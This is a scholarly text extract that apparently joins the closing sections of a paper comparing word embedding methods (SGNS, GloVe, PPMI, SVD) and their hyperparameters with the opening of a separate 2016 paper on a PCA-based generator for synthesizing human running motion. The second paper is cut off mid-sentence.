claims, and examine their validity based on the re- sults in Table 5.8 Are embeddings superior to count-based dis- tributional methods? It is commonly believed that modern prediction-based embeddings per- form better than traditional count-based methods. This claim was recently supported by a series of systematic evaluations by Baroni et al. (2014). However, our results suggest a different trend. Ta- ble 5 shows that in word similarity tasks, the av- erage score of SGNS is actually lower than SVD’s when win = 2, 5, and it never outperforms SVD 7word2vec.googlecode.com/svn/trunk/ demo-train-big-model-v1.sh 8We note that all conclusions drawn in this section rely on the specific data and settings with which we experiment. It is indeed feasible that experiments on different tasks, data, and hyperparameters may yield other conclusions. by more than 1.7 points in those cases. In Google’s analogies SGNS and GloVe indeed perform bet- ter than PPMI, but only by a margin of 3.7 points (compare PPMI with win = 2 and SGNS with win = 5). MSR’s analogy dataset is the only case where SGNS and GloVe substantially outperform PPMI and SVD.9 Overall, there does not seem to be a consistent significant advantage to one ap- proach over the other, thus refuting the claim that prediction-based methods are superior to count- based approaches. The contradictory results in (Baroni et al., 2014) stem from creating word2vec embed- dings with somewhat pre-tuned hyperparameters (recommended by word2vec), and comparing them to “vanilla” PPMI and SVD representa- tions. In particular, shifted PMI (negative sam- pling) and context distribution smoothing (cds = 0.75, equation (3) in Section 3.2) were turned on for SGNS, but not for PPMI and SVD. An additional difference is Baroni et al.’s setting of eig=1, which significantly deteriorates SVD’s performance (see Section 6.1). Is GloVe superior to SGNS? Pennington et al. (2014) show a variety of experiments in which GloVe outperforms SGNS (among other meth- ods). However, our results show the complete op- posite. In fact, SGNS outperforms GloVe in every task (Table 5). Only when restricted to 3CosAdd, a suboptimal configuration, does GloVe show a 0.8 point advantage over SGNS. This trend persists when scaling up to a larger corpus and vocabulary. This contradiction can be explained by three major differences in the experimental setup. First, in our experiments, hyperparameters were allowed to vary; in particular, w+c was applied to all the methods, including SGNS. Secondly, Pennington et al. (2014) only evaluated on Google’s analo- gies, but not on MSR’s. Finally, in our work, all methods are compared using the same underlying corpus. It is also important to bear in mind that, by definition, GloVe cannot use two hyperparame- ters: shifted PMI (neg) and context distribution smoothing (cds). Instead, GloVe learns a set of bias parameters that subsumes these two modifica- tions and many other potential changes to the PMI metric. Albeit its greater flexibility, GloVe does not fair better than SGNS in our experiments. 9Unlike PPMI, SVD underperforms in both analogy tasks. Is PPMI on-par with SGNS on analogy tasks? Levy and Goldberg (2014b) show that PPMI and SGNS perform similarly on both Google’s and MSR’s analogy tasks. Nevertheless, the results in Table 5 show a clear advantage to SGNS. While the gap on Google’s analogies is not very large (PPMI lags behind SGNS by only 3.7 points), SGNS consistently outperforms PPMI by a large margin on the MSR dataset. MSR’s analogy dataset captures syntactic relations, such as singular-plural inflections for nouns and tense modifications for verbs. We conjecture that cap- turing these syntactic relations may rely on certain types of contexts, such as determiners and func- tion words, which SGNS might be better at cap- turing – perhaps due to the way it assigns weights to different examples, or because it also captures negative correlations which are filtered by PPMI. A deeper look into Levy and Goldberg’s (2014b) experiments reveals the use of PPMI with positional contexts (i.e. each context is a conjunc- tion of a word and its relative position to the target word), whereas SGNS was employed with regular bag-of-words contexts. Positional contexts might contain relevant information for recovering syn- tactic analogies, explaining PPMI’s relatively high score on MSR’s analogy task in (Levy and Gold- berg, 2014b). Does 3CosMul recover more analogies than 3CosAdd? Levy and Goldberg (2014b) show that using similarity multiplication (3CosMul) rather than addition (3CosAdd) improves results on all methods and on every task. This claim is consistent with our findings; indeed, 3CosMul dominates 3CosAdd in every case. The improve- ment is particularly noticeable for SVD and PPMI, which considerably underperform other methods when using 3CosAdd. 5.4 Comparison with CBOW Another algorithm featured in word2vec is CBOW. Unlike the other methods, CBOW cannot be easily expressed as a factorization of a word- context matrix; it ties together the tokens of each context window by representing the context vec- tor as the sum of its words’ vectors. It is thus more expressive than the other methods, and has a po- tential of deriving better word representations. While Mikolov et al. (2013b) found SGNS to outperform CBOW, Baroni et al. (2014) reports that CBOW had a slight advantage. We com- win eig Average Performance 0 .612 2 0.5 .611 1 .551 0 .616 5 0.5 .612 1 .534 0 .584 10 0.5 .567 1 .484 Table 6: The average performance of SVD on word similarity tasks given different values of eig, in the vanilla scenario. pared CBOW to the other methods when setting all the hyperparameters to the defaults provided by word2vec (Table 3). With the exception of MSR’s analogy task, CBOW is not the best- performing method of any other task in this sce- nario. Other scenarios showed similar trends in our preliminary experiments. While CBOW can potentially derive better rep- resentations by combining the tokens in each con- text window, this potential is not realized in prac- tice. Nevertheless, Melamud et al. (2014) show that capturing joint contexts can indeed improve performance on word similarity tasks, and we be- lieve it is a direction worth pursuing. 6 Hyperparameter Analysis We analyze the individual impact of each hyper- parameter, and try to characterize the conditions in which a certain setting is beneficial. 6.1 Harmful Configurations Certain hyperparameter settings might cripple the performance of a certain method. We observe two scenarios in which SVD performs poorly. SVD does not benefit from shifted PPMI. Set- ting neg > 1 consistently deteriorates SVD’s per- formance. Levy and Goldberg (2014c) made a similar observation, and hypothesized that this is a result of the increasing number of zero-cells, which may cause SVD to prefer a factorization that is very close to the zero matrix. SVD’s L2 ob- jective is unweighted, and it does not distinguish between observed and unobserved matrix cells. Using SVD “correctly” is bad. The traditional way of representing words with SVD uses the eigenvalue matrix (eig = 1): W = Ud · Σd. De- spite being theoretically well-motivated, this set- ting leads to very poor results in practice, when compared to other settings (eig = 0.5 or 0). Ta- ble 6 demonstrates this gap. The drop in average accuracy when setting eig = 1 is astounding. The performance gap persists under different hyperparameter settings as well, and drops in performance of over 15 points (absolute) when using eig = 1 instead of eig = 0.5 or 0 are not uncommon. This setting is one of the main reasons for SVD’s inferior results in the study by Baroni et al. (2014), and also the reason we chose to use eig = 0.5 as the default setting for SVD in the vanilla scenario. 6.2 Beneficial Configurations To identify which hyperparameter settings are beneficial, we looked at the best configuration of each method on each task. We then counted the number of times each hyperparameter setting was chosen in these configurations (Table 7). Some trends emerge, such as PPMI and SVD’s prefer- ence towards shorter context windows10 (win = 2), and that SGNS always prefers numerous nega- tive samples (neg > 1). To get a closer look and isolate the effect of each hyperparameter, we controlled for said hy- perparameter, and compared the best configura- tions given each of the hyperparameter’s settings. Table 8 shows the difference between default and non-default settings of each hyperparameter. While many hyperparameter settings can im- prove performance, they may also degrade it when chosen incorrectly. For instance, in the case of shifted PMI (neg), SGNS consistently profits from neg > 1, while SVD’s performance is dra- matically reduced. For PPMI, the utility of ap- plying neg > 1 depends on the type of task: word similarity or analogy. Another example is dynamic context windows (dyn), which is benefi- cial for MSR’s analogy task, but largely detrimen- tal to other tasks. It appears that the only hyperparameter that can be “blindly” applied in any situation is context distribution smoothing (cds = 0.75), yielding a consistent improvement at an insignificant risk. Note that cds helps PPMI more than it does other methods; we suggest that this is because it re- duces the relative impact of rare words on the dis- tributional representation, thus addressing PMI’s “Achilles’ heel”. 10This might also relate to PMI’s bias towards infrequent events (see Section 2.1). Broader windows create more ran- dom co-occurrences with rare words, “polluting” the distribu- tional vector with random words that have high PMI scores. 7 Practical Recommendations It is generally advisable to tune all hyperparam- eters, as well as algorithm-specific hyperparame- ters, for the task at hand. However, this may be computationally expensive. We thus provide some “rules of thumb”, which we found to work well in our setting: • Always use context distribution smoothing (cds = 0.75) to modify PMI, as described in Section 3.2. It consistently improves performance, and is applicable to PPMI, SVD, and SGNS. • Do not use SVD “correctly” (eig = 1). Instead, use one of the symmetric variants (Section 3.3). • SGNS is a robust baseline. While it might not be the best method for every task, it does not signif- icantly underperform in any scenario. Moreover, SGNS is the fastest method to train, and cheapest (by far) in terms of disk space and memory con- sumption. • With SGNS, prefer many negative samples. • for both SGNS and GloVe, it is worthwhile to ex- periment with the ~w +~c variant, which is cheap to apply (does not require retraining) and can result in substantial gains (as well as substantial losses). 8 Conclusions Recent embedding methods introduce a plethora of design choices beyond network architecture and optimization algorithms. We reveal that these seemingly minor variations can have a large im- pact on the success of word representation meth- ods. By showing how to adapt and tune these hy- perparameters in traditional methods, we allow a proper comparison between representations, and challenge various claims of superiority from the word embedding literature. This study also exposes the need for more controlled-variable experiments, and extending the concept of “variable” from the obvious task, data, and method to the often ignored prepro- cessing steps and hyperparameter settings. We also stress the need for transparent and repro- ducible experiments, and commend authors such as Mikolov, Pennington, and others for making their code publicly available. In this spirit, we make our code available as well.11 11http://bitbucket.org/omerlevy/ hyperwords Method win dyn sub neg cds w+c 2 : 5 : 10 none : with none : dirty 1 : 5 : 15 1.00 : 0.75 only w : w + c PPMI 7 : 1 : 0 4 : 4 4 : 4 2 : 6 : 0 1 : 7 — SVD 7 : 1 : 0 4 : 4 1 : 7 8 : 0 : 0 2 : 6 7 : 1 SGNS 2 : 3 : 3 6 : 2 4 : 4 0 : 4 : 4 3 : 5 4 : 4 GloVe 1 : 3 : 4 6 : 2 7 : 1 — — 4 : 4 Table 7: The impact of each hyperparameter, measured by the number of tasks in which the best configuration had that hyper- parameter setting. Non-applicable combinations are marked by “—”. Method WordSim WordSim Bruni et al. Radinsky et al. Luong et al. Hill et al. Google MSR Similarity Relatedness MEN M. Turk Rare Words SimLex Mul Mul PPMI +0.5% –1.0% 0.0% +0.1% +0.4% –0.1% –0.1% +1.2% SVD –0.8% –0.2% 0.0% +0.6% +0.4% –0.1% +0.6% +2.1% SGNS –0.9% –1.5% –0.3% +0.1% –0.1% –0.1% –1.0% +0.7% GloVe –0.8% –1.2% –0.9% –0.8% +0.1% –0.9% –3.3% +1.8% (a) Performance difference between best models with dyn = with and dyn = none. Method WordSim WordSim Bruni et al. Radinsky et al. Luong et al. Hill et al. Google MSR Similarity Relatedness MEN M. Turk Rare Words SimLex Mul Mul PPMI +0.6% +1.9% +1.3% +1.0% –3.8% –3.9% –5.0% –12.2% SVD +0.7% +0.2% +0.6% +0.7% +0.8% –0.3% +4.0% +2.4% SGNS +1.5% +2.2% +1.5% +0.1% –0.4% –0.1% –4.4% –5.4% GloVe +0.2% –1.3% –1.0% –0.2% –3.4% –0.9% –3.0% –3.6% (b) Performance difference between best models with sub = dirty and sub = none. Method WordSim WordSim Bruni et al. Radinsky et al. Luong et al. Hill et al. Google MSR Similarity Relatedness MEN M. Turk Rare Words SimLex Mul Mul PPMI +0.6% +4.9% +1.3% +1.0% +2.2% +0.8% –6.2% –9.2% SVD –1.7% –2.2% –1.9% –4.6% –3.4% –3.5% –13.9% –14.9% SGNS +1.5% +2.9% +2.3% +0.5% +1.5% +1.1% +3.3% +2.1% GloVe — — — — — — — — (c) Performance difference between best models with neg > 1 and neg = 1. Method WordSim WordSim Bruni et al. Radinsky et al. Luong et al. Hill et al. Google MSR Similarity Relatedness MEN M. Turk Rare Words SimLex Mul Mul PPMI +1.3% +2.8% 0.0% +2.1% +3.5% +2.9% +2.7% +9.2% SVD +0.4% –0.2% +0.1% +1.1% +0.4% –0.3% +1.4% +2.2% SGNS +0.4% +1.4% 0.0% +0.1% 0.0% +0.2% +0.6% 0.0% GloVe — — — — — — — — (d) Performance difference between best models with cds = 0.75 and cds = 1. Method WordSim WordSim Bruni et al. Radinsky et al. Luong et al. Hill et al. Google MSR Similarity Relatedness MEN M. Turk Rare Words SimLex Mul Mul PPMI — — — — — — — — SVD –0.6% –0.2% –0.4% –2.1% –0.7% +0.7% –1.8% –3.4% SGNS +1.4% +2.2% +1.2% +1.1% –0.3% –2.3% –1.0% –7.5% GloVe +2.3% +4.7% +3.0% –0.1% –0.7% –2.6% +3.3% –8.9% (e) Performance difference between best models with w+c = w + c and w+c = only w. Table 8: The added value versus the risk of setting each hyperparameter. The figures show the differences in performance between the best achievable configurations when restricting a hyperparameter to different values. This difference indicates the potential gain of tuning a given hyperparameter, as well as the risks of decreased performance when not tuning it. For example, an entry of +9.2% in Table (d) means that the best model with cds = 0.75 is 9.2% more accurate (absolute) than the best model with cds = 1; i.e. on MSR’s analogies, using cds = 0.75 instead of cds = 1 improved PPMI’s accuracy from .443 to .535. Acknowledgements This work was supported by the Google Research Award Program and the German Research Foun- dation via the German-Israeli Project Cooperation (grant DA 1600/1-1). We thank Marco Baroni and Jeffrey Pennington for their valuable comments. References Eneko Agirre, Enrique Alfonseca, Keith Hall, Jana Kravalova, Marius Pasca, and Aitor Soroa. 2009. A study on similarity and relatedness using distribu- tional and wordnet-based approaches. In Proceed- ings of Human Language Technologies: The 2009 Annual Conference of the North American Chap- ter of the Association for Computational Linguistics, pages 19–27, Boulder, Colorado, June. Association for Computational Linguistics. Marco Baroni and Alessandro Lenci. 2010. Dis- tributional memory: A general framework for corpus-based semantics. Computational Linguis- tics, 36(4):673–721. Marco Baroni, Georgiana Dinu, and Germán Kruszewski. 2014. Dont count, predict! a systematic comparison of context-counting vs. context-predicting semantic vectors. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 238–247, Baltimore, Maryland, June. Association for Computational Linguistics. Yoshua Bengio, Réjean Ducharme, Pascal Vincent, and Christian Jauvin. 2003. A neural probabilistic lan- guage model. Journal of Machine Learning Re- search, 3:1137–1155. Elia Bruni, Gemma Boleda, Marco Baroni, and Nam Khanh Tran. 2012. Distributional semantics in technicolor. In Proceedings of the 50th Annual Meeting of the Association for Computational Lin- guistics (Volume 1: Long Papers), pages 136–145, Jeju Island, Korea, July. Association for Computa- tional Linguistics. John A Bullinaria and Joseph P Levy. 2007. Extracting semantic representations from word co-occurrence statistics: a computational study. Behavior Research Methods, 39(3):510–526. John A Bullinaria and Joseph P Levy. 2012. Extracting semantic representations from word co-occurrence statistics: Stop-lists, stemming, and SVD. Behavior Research Methods, 44(3):890–907. John Caron. 2001. Experiments with LSA scor- ing: optimal rank and basis. In Proceedings of the SIAM Computational Information Retrieval Work- shop, pages 157–169. Kenneth Ward Church and Patrick Hanks. 1990. Word association norms, mutual information, and lexicog- raphy. Computational Linguistics, 16(1):22–29. Ronan Collobert and Jason Weston. 2008. A unified architecture for natural language processing: Deep neural networks with multitask learning. In Pro- ceedings of the 25th International Conference on Machine Learning, pages 160–167. Scott C. Deerwester, Susan T. Dumais, Thomas K. Lan- dauer, George W. Furnas, and Richard A. Harshman. 1990. Indexing by latent semantic analysis. JASIS, 41(6):391–407. C Eckart and G Young. 1936. The approximation of one matrix by another of lower rank. Psychome- trika, 1:211–218. Roi Reichart Felix Hill and Anna Korhonen. 2014. Simlex-999: Evaluating semantic models with (genuine) similarity estimation. arXiv preprint arXiv:1408.3456. Adriano Ferraresi, Eros Zanchetta, Marco Baroni, and Silvia Bernardini. 2008. Introducing and evaluating ukwac, a very large web-derived corpus of English. In Proceedings of the 4th Web as Corpus Workshop (WAC-4), pages 47–54. Lev Finkelstein, Evgeniy Gabrilovich, Yossi Matias, Ehud Rivlin, Zach Solan, Gadi Wolfman, and Ey- tan Ruppin. 2002. Placing search in context: The concept revisited. ACM Transactions on Informa- tion Systems, 20(1):116–131. Yoav Goldberg and Omer Levy. 2014. word2vec explained: deriving Mikolov et al.’s negative- sampling word-embedding method. arXiv preprint arXiv:1402.3722. Zellig Harris. 1954. Distributional structure. Word, 10(23):146–162. Omer Levy and Yoav Goldberg. 2014a. Dependency- based word embeddings. In Proceedings of the 52nd Annual Meeting of the Association for Computa- tional Linguistics (Volume 2: Short Papers), pages 302–308, Baltimore, Maryland. Omer Levy and Yoav Goldberg. 2014b. Linguistic regularities in sparse and explicit word representa- tions. In Proceedings of the Eighteenth Confer- ence on Computational Natural Language Learning, pages 171–180, Baltimore, Maryland. Omer Levy and Yoav Goldberg. 2014c. Neural word embeddings as implicit matrix factorization. In Ad- vances in Neural Information Processing Systems 27: Annual Conference on Neural Information Pro- cessing Systems 2014, December 8-13 2014, Mon- treal, Quebec, Canada, pages 2177–2185. Minh-Thang Luong, Richard Socher, and Christo- pher D. Manning. 2013. Better word representa- tions with recursive neural networks for morphol- ogy. In Proceedings of the Seventeenth Confer- ence on Computational Natural Language Learning, pages 104–113, Sofia, Bulgaria, August. Associa- tion for Computational Linguistics. Oren Melamud, Ido Dagan, Jacob Goldberger, Idan Szpektor, and Deniz Yuret. 2014. Probabilistic modeling of joint-context in distributional similar- ity. In Proceedings of the Eighteenth Conference on Computational Natural Language Learning, pages 181–190, Baltimore, Maryland, June. Association for Computational Linguistics. Tomas Mikolov, Kai Chen, Gregory S. Corrado, and Jeffrey Dean. 2013a. Efficient estimation of word representations in vector space. In Proceedings of the International Conference on Learning Represen- tations (ICLR). Tomas Mikolov, Ilya Sutskever, Kai Chen, Gregory S. Corrado, and Jeffrey Dean. 2013b. Distributed rep- resentations of words and phrases and their compo- sitionality. In Advances in Neural Information Pro- cessing Systems, pages 3111–3119. Tomas Mikolov, Wen-tau Yih, and Geoffrey Zweig. 2013c. Linguistic regularities in continuous space word representations. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 746–751. Sebastian Padó and Mirella Lapata. 2007. Dependency-based construction of semantic space models. Computational Linguistics, 33(2):161–199. Patrick Pantel and Dekang Lin. 2002. Discovering word senses from text. In Proceedings of the eighth ACM SIGKDD international conference on Knowl- edge discovery and data mining, pages 613–619. ACM. Jeffrey Pennington, Richard Socher, and Christopher Manning. 2014. Glove: Global vectors for word representation. In Proceedings of the 2014 Con- ference on Empirical Methods in Natural Language Processing (EMNLP), pages 1532–1543, Doha, Qatar, October. Association for Computational Lin- guistics. Kira Radinsky, Eugene Agichtein, Evgeniy Gabrilovich, and Shaul Markovitch. 2011. A word at a time: Computing word relatedness using temporal semantic analysis. In Proceedings of the 20th international conference on World wide web, pages 337–346. ACM. Magnus Sahlgren. 2006. The Word-Space Model. Ph.D. thesis, Stockholm University. Peter D. Turney and Michael L. Littman. 2003. Mea- suring praise and criticism: Inference of semantic orientation from association. Transactions on Infor- mation Systems, 21(4):315–346. Peter D. Turney and Patrick Pantel. 2010. From frequency to meaning: Vector space models of se- mantics. Journal of Artificial Intelligence Research, 37(1):141–188. Peter D. Turney. 2012. Domain and function: A dual- space model of semantic relations and compositions. Journal of Artificial Intelligence Research, 44:533– 585. Torsten Zesch, Christof Müller, and Iryna Gurevych. 2008. Using wiktionary for computing semantic relatedness. In Proceedings of the 23rd National Conference on Artificial Intelligence - Volume 2, AAAI’08, pages 861–866. AAAI Press. work_ou6v3eqnl5bxnhbcixnjtwh65y ---- Submitted 12 July 2016 Accepted 15 November 2016 Published 19 December 2016 Corresponding author Juan Vicente Durá-Gil, juan.dura@ibv.upv.es Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.102 Copyright 2016 Baydal-Bertomeu et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A PCA-based bio-motion generator to synthesize new patterns of human running José María Baydal-Bertomeu*, Juan Vicente Durá-Gil*, Ana Piérola-Orcero*, Eduardo Parrilla Bernabé*, Alfredo Ballester* and Sandra Alemany-Munt* Instituto de Biomecánica de Valencia, Universitat Politècnica de València, Valencia, Spain * These authors contributed equally to this work. ABSTRACT Synthesizing human movement is useful for most applications where the use of avatars is required. These movements should be as realistic as possible and thus must take into account anthropometric characteristics (weight, height, etc.), gender, and the performance of the activity being developed. The aim of this study is to develop a new methodology based on the combination of principal component analysis and partial least squares regression model that can generate realistic motion from a set of data (gender, anthropometry and performance). A total of 18 volunteer runners have participated in the study. The joint angles of the main body joints were recorded in an experimental study using 3D motion tracking technology. A five-step methodology has been employed to develop a model capable of generating a realistic running motion. The described model has been validated for running motion, showing a highly realistic motion which fits properly with the real movements measured. The described methodology could be applied to synthesize any type of motion: walking, going up and down stairs, etc. In future work, we want to integrate the motion in realistic body shapes, generated with a similar methodology and from the same simple original data. Subjects Data Mining and Machine Learning, Graphics, Scientific Computing and Simulation Keywords Synthesizing motion, Motion analysis, PLS, Running, PCA INTRODUCTION It is well known that there is a large degree of information contained in the kinematics of a moving body which is influenced by parameters such as: gender, age, anthropometrical fea- tures, emotional state, personality traits, etc. (Troje, 2008). A number of studies demonstrate the capability of the human visual system to detect, recognize and interpret the information encoded in the biological motion (Johansson, 1973). There are also many attempts to analyse this information encrypted in human motion. Some researchers use discrete kinematics parameters such as ranges, speed, etc. (Dvorak et al., 1992). Others focus their studies on the sequence of movement along time instead of recording simple parameters. In these cases, they analyse the complete function of time f (t) (Feipel et al., 1999). A number of kinematical models are based on frequency domain manipulations (Davis, Bobick & Richards, 2000) and multiresolution filtering (Bruderlin & Williams, 1995). How to cite this article Baydal-Bertomeu et al. (2016), A PCA-based bio-motion generator to synthesize new patterns of human run- ning. PeerJ Comput. Sci. 2:e102; DOI 10.7717/peerj-cs.102 https://peerj.com mailto:juan.dura@ibv.upv.es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.102 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.102 Nevertheless, the most common objective of these studies is to model and to classify the movement pattern of the person being measured, rather than creating new motions from the extracted information. In this regard, motion synthesis is currently attracting a great deal of attention within the computer graphics community as a means of animating three dimensional realistic characters and avatars; and in the robotic field to provide controlled real-time dynamic motion for the locomotion and other activities (Kajita et al., 2002). With the computational resources available today, large-scale models of the body (i.e., models that have many degrees of freedom and are actuated by many muscles) may be used to perform realistic simulations (Pandy, 2001). Nevertheless, it is necessary to perform lab experiments to track the positions and orientations of body segments executing the task aimed to be synthesized. Recording motion data directly from real actors and mapping them to computer characters is a common technique used to generate high quality motion (Li, Wang & Shum, 2002). However, this technique requires a high effort in experimental work. Besides, new measures are needed to include changes in the pattern of movement, such as age, weight, gender or speed. In this sense, it would be useful to create a methodology based on biomechanical models constructed from a database of motions, instead of a single actor, able to generate realistic motions of individuals with different anthropometrical characteristics, with sufficient accuracy and without the need to perform laboratory measurements. Several authors have addressed the motion modelling and synthesis for biped walking, jumping, pedalling (Troje, 2002), or even stair-ascending (Vasilescu, 2002). Classically the mathematical approach of the synthesis of movement has been the dynamic optimization of biomechanical body structures (Pandy, 2001). These models provide detailed information of the functioning of some structures, such as the description of muscle function during normal gait. However, this approach becomes an unworkable problem when a greater number of body structures are included in the model. A new approach based on Principal Components Analysis (PCA) can facilitate the understanding of the information contained in the kinematics of a moving human body and avoids the inclusion of the dynamics in the model. PCA can extract depth information contained in the mathematical function and its derivatives not normally available through traditional statistical methods (Ullah & Finch, 2013). In this way PCA can be used on different levels. For instance, Troje (2002) used PCA in two steps for the purpose of analysing and synthesizing human gait patterns. In the first one, they extracted the main components from the entire database, in order to eliminate redundancy and to reduce the dimensionality. In the second step, PCA was applied particularly for each walker in order to retain the encoded information of each walker-specific variation. In our research, we will also use a model (based on PCA) to extract the most relevant information from the pattern of running. This information will be used to develop a bio-motion generator which will solve the opposite problem of synthesizing new realistic movements. In addition, existing literature focused on synthesizing motion does not correlate the generated movement to age, gender, performance parameters such as velocity or anthropometrical features. In this sense our research has three goals. The first one is to generate a database of running movements of a full human model. The second is to Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 2/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 extract the signature of each motion, by means of PCA technique and to correlate the distinctive styles of each runner with their anthropometrical characteristics, age, gender, and performance parameters such as the velocity of the action. The third is to develop a bio-motion generator based on a statistical model capable of synthesizing new realistic running motion from a set of desired data: age, gender, height, body mass index (BMI) and velocity. Nowadays there exists a line of research developed in the field of anthropometry for the purpose of obtaining a model of human body shape from a database of processed raw scans (Vinué et al., 2014). The methodology followed in that line of research provides sufficient resolution to synthesize accurate realistic representations of body shapes from a set of simple anthropometrical parameters. Ballester et al. (2014) describe a method based on the harmonization of body scan data followed by a Shape Analysis procedure using Principal Component Analysis. The combination of these techniques allows the generation of human 3D shape models from anthropometric measurement data (age, height, weight, BMI, waist girth, hip girth, bust/chest girth, etc.). Our hypothesis is that the use of a similarly based methodology to generate human motion instead of human body shapes is possible, valid and reliable. The novelty in our approach is the generation of running data from a set of easily measurable anthropometric parameters and a desired value of running speed. MATERIALS AND METHODS Data gathering An experimental phase was carried out with the aim of gathering a database of the running movements that we needed to include in the biomechanical model. The data consisted of the 3D joint angles of the main body joints. The articulated human body model used in our study comprised 21 segments and 20 joints distributed throughout the body. Lower limb: hip, knee, ankle and metatarsopha- langeal joint; upper limb: shoulder, elbow and wrist; trunk: pelvis, L5, L3, T12, T8 and Neck. The positions of the joints of the human body model were defined in a recursive mode with respect to the origin joint (father) of the related segment. This methodology is based on the BioVision Hierarchical data (BVH) format (Meredith & Maddock, 2001). Each subject was kinematically characterised by means of 64 variables, defined as follows: 1. Vertical (Z) position of the root segment, in our case the hips. 2. Tri-dimensional orientation (X, Y, Z) of the total amount of segments with respect the root. 21×3=63 variables. Study sample Eighteen people composed the study sample, with the same number of male and female. Theiragesranged from21to44years (averageage:31years). Theywere selectedaccordingto some specific parameters, trying to cover a wide range in the anthropometric characteristics of height and body mass index (Table 1). Ethical approval was obtained from the ethics committee of the Universitat Politècnica València. All participants gave written informed consent. Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 3/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 Table 1 Description of the anthropometrical parameters. Gender Parameter Mean Std. Max. Min. Age 32.0 5.1 40 26 Weight 86.712 16.813 118.000 59.000 Height 1.779 .086 1.910 1.630 Male BMI 27.263 4.118 33.412 21.914 Age 30.5 8.472 44 21 Weight 74.596 17.535 108.000 50.000 Height 1.675 .087 1.780 1.550 Female BMI 26.362 4.747 34.473 19.257 Measurement and protocol The measurements were performed using commercial equipment based on 17 inertial sensors: MOVEN studio. The commercial system has been validated by previous studies (Zhang et al., 2013; Thies et al., 2007). Asamplingfrequencyof120Hzwasused. Thissystem showed a very high sensitivity to electromagnetic fields. For this reason, the measurements of running trials were done outdoors in a location free of electromagnetic pollution. Experimental procedure For the purpose of controlling the pace of running, a 20-metre-long corridor, delimited with cones every 5 m was set up. Thus, we obtained four areas, one area of acceleration, two of constant speed and a final deceleration area. Running at constant speed presents a periodic timing in which the period depends on the velocity (Novacheck, 1998). Nevertheless, acceleration and deceleration periods are out of phase and the duration of cycles is variable. Therefore, the running cycles used to create our model were selected within the area of constant speed. In the case of running, the pattern of the movement changes with velocity (e.g., stride length, maximum joint angles, etc.). For this reason, each runner completed six running trials at different speeds. Initially, subjects started running at normal speed. In the second measurement subjects ran at their maximum speed. The third and fourth trial were performed at a pace between normal and maximum speed. The fifth trial was performed at the minimum speed at which each runner was able to run, on the edge between walking and running. Running defined in this case as when there is no phase of bipodal support (Biewener et al., 2004). The last trial was performed at an average speed between the lower and the normal speed. This procedure allowed us to obtain six observations representing the whole range of speeds that each subject could execute. Mathematical procedure The methodology used in our study comprised five steps: 1-Reduction of intra-personal variability: joint angles are periodic by nature. We took the most representative single stride for the purpose of reducing variability and dismiss the phases with no consistent speed, such as acceleration and deceleration steps. The selected stride was picked in the middle of the running sequence, guaranteeing constant speed. Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 4/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 Figure 1 Knee angle vs % of the cycle. 2-Time normalization: time normalization is usually employed for the temporal alignment of cyclic data obtained from different trials with different duration. In our approach, the number of samples for each stride depended on the velocity of the running. At this point we normalised the variable ‘‘time’’ applying an interpolation technique based on cubic splines through the measured values of the whole sequence of samples. This technique enables the normalization of all the measurements to the percentage of the running cycle. The cubic spline was applied to normalize at 50 equispaced time intervals per each variable (see the example in Fig. 1). The application of the cubic spline to the 64 kinematical variables makes a total amount of 50 × 64 (3,200) data per each subject. 3-Data cleaning: at this point a detailed checking and cleaning of inaccuracies of the kinematical data was conducted. These type of inaccuracies were caused mostly by the measurement system. The prevention of errors at this point is preferable to their later correction once the model has been created. All the measurements have been manually analysed thoroughly by an experienced examiner. The identified inaccuracies were treated as follows: (a) Angular offsets: this common error usually appears during the standing posture and can affect the later joint angles registers during the trial (running) (Mills et al., 2007). Offsets have been corrected manually eliminating (adding or subtracting) the difference between the initial angle observed and the expected angle of the body segment at this position. (b) Positioning error: due to the fact that our measurement system, based on inertial sensors, uses the earth’s magnetic field to determine the reference position of each subject, it is quite common to find subjects with slight differences in their initial reference positions. In this case, we have proceeded by correcting the reference system aligning it with the direction of running forward. Thus, we can guarantee that all measurements are equally oriented. Baydal-Bertomeu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.102 5/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.102 (c) Non-physiological angles: some errors in the registration of joint angles were detected in the database. These inaccuracies came from errors of the inertial sensors. In this case, it was not possible to correct the error effectively, thus we proceed by eliminating these observations from the database and repeating the measurement. 4-Dimensionality reduction: the database of all measurements was combined in a single matrix W . The initial number of observations is 108 (18 subjects×6 velocities=108). But three measurements fail, therefore W has 105 rows (observations) and 3,200 columns (50 equispaced time intervals × 64 kinematical variables). Motion data of each observation is enclosed in the rows of the matrix W =(wi),i=1,...,105. Before the creation of the bio-motion generator, by means of a regression model, it was needed to reduce the dimensionality of the motion data. Computing a PCA on the running data (contained in matrix W ), resulted in a decomposition of the data matrix W into an average running vector w0 and 3,200 weighed components, arranged in a 3,200 × 3,200 matrix V : W =W0+α·V (1) where W0 is a 105×3,200 matrix with all rows equal to w0 and α=(αi) with i=1,...,105 is a 105 × 3,200 matrix of PCA scores. Each observation wi was thus expressed by a linear combination of scores αi and PCA components (columns of matrix V ). Components represented factors related to gender, anthropometrical traits and running speed. And scores represented individual characteristics of each runner and performance of the running trial related to the previous factors. PCA components are arranged in descendent order of explained variance of the original matrix data. Thus the first columns in matrix V retained most of the information in the data sample and it was possible to select a reduced number of components c. wic =w0+αic ·Vc. (2) Above w0 denoted the average of all the running samples. The matrix Vc contained the first components. αic represents the c scores of each observation of the database in the reduced dimension space formed by the selected components. As score values change from negative to positive values, the movement of the runner changes from men to women; high BMI to low BMI; high speed to low speed, etc. The decision of how many components to 